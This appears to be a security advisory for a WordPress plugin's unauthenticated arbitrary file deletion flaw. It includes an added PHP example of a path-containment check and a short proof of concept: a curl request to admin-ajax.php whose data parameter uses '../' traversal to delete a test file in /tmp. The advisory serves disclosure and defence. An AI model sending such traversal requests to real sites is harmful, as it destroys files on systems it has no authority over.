The plugin is affected by an arbitrary file deletion vulnerability: an AJAX action available to unauthenticated users takes user input, uses it to build a file path, and passes that path to unlink() without validating it first.
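A containment check of the kind the missing validation calls for, as an added example (not the plugin's code or its actual fix). The helper name delete_within() and the demo directory layout are hypothetical and constructed for illustration.

```php
<?php
// Added example: hypothetical helper, not taken from the plugin.
// Deletes a file only when it resolves to a regular file inside $baseDir.
function delete_within(string $baseDir, string $userPath): bool
{
    $base = realpath($baseDir);
    if ($base === false) {
        return false; // base directory does not exist
    }
    // realpath() collapses "../" segments and follows symlinks; it returns
    // false when the target does not exist, so there is nothing to delete.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false || !is_file($target)) {
        return false;
    }
    // Compare against the base plus a trailing separator, so a sibling
    // such as /srv/cache-old is not treated as being inside /srv/cache.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return unlink($target);
}

// Constructed demo layout: one file inside the allowed directory, one outside.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'containment_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/cache', 0700, true);
file_put_contents($root . '/cache/preview.png', 'x');
file_put_contents($root . '/outside.txt', 'x');

// A plain file name inside the base directory.
echo delete_within($root . '/cache', 'preview.png') ? "deleted\n" : "refused\n";
// A relative path that climbs out of the base directory.
echo delete_within($root . '/cache', '../outside.txt') ? "deleted\n" : "refused\n";
echo file_exists($root . '/outside.txt') ? "outside.txt still present\n" : "outside.txt gone\n";

// Clean up the constructed layout.
unlink($root . '/outside.txt');
rmdir($root . '/cache');
rmdir($root);
```

Because the action is reachable by unauthenticated users, a WordPress handler would normally pair a check like this with check_ajax_referer() and current_user_can() before touching the filesystem.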
Create a dummy file on the WordPress host to delete (the file must be owned by the web user):
echo '1' > /tmp/delete_me.txt && chown 'www-data:www-data' /tmp/delete_me.txt
Invoke the following curl command to delete the dummy file:
curl 'http://127.0.0.1/wp-admin/admin-ajax.php' \
--data 'action=mkl_pc_generate_config_image&data=../../../../../../tmp/delete_me.txt'
Verify the file has been deleted.
cydave
cydave
Yes
2022-06-06 (about 11 months ago)
2022-06-06 (about 11 months ago)
2023-03-08 (about 2 months ago)